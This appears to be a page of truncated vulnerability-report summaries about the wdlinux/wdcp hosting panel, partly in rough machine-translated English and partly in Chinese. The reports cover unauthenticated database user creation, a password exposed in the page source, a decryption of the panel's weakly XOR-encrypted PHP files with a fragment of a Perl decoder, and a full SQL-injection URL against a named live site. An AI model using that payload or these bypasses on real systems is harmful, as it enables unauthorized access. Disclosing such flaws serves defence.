wdlinux virtual host Management System File No Access authentication to establish a direct database user-vulnerability warning-the black bar safety net

Brief description: wdcpv2. 5. 1 0 file non-access authentication to establish a direct database account Detailed description: wdcpv2. 5. 1 0 file non-access authentication mysql/adduser. php to establish a direct account truncation of the modified data package to mount the default database to...

wdlinux#所有版本某密码策略设计错误

简要描述： 0.0 详细说明： wdlinux 所以版本 某密码策略设计错误 主页：http://www.wdlinux.cn 程序安装之后，在控制面板中： 比如FTP用户： 这里密码据说是隐藏，可是呢？ F12看下 好了 就这样 漏洞证明： 如上...

看我手动解密wdLinux所有PHP文件

简要描述： wdLinux的PHP文件,加密超级简单,大家快来挖洞呀 wdcpv2.5.tar.gz里面的PHP已经全部解密 详细说明： 偶然看到wdLinux这套系统, 发现使用PHP插件进行加密的, 觉得很好玩就尝试解密. 漏洞证明： 算法超级简单, 有一个写死的key, 10位. 加密的时候首先用zlib压缩, 然后按照一定算法逐个和这个key做xor运算. 最后补一个文件头作为识别码. 已经成功全盘解密, 贴个文件: 最后贴下perl代码吧: sub wddecode my @data = unpack 'C', substr readfile $0, 9; my @key =...

wdlinux一处sql注射

简要描述： rt 详细说明： http://www.wdlinux.cn/bbs/faq.php?action=grouppermission&gids99=%27&gids1000=%20and%20select%201%20from%20select%20count,concatversion,floorrand02x%20from%20informationschema%20.tables%20group%20by%20xa%23 漏洞证明：...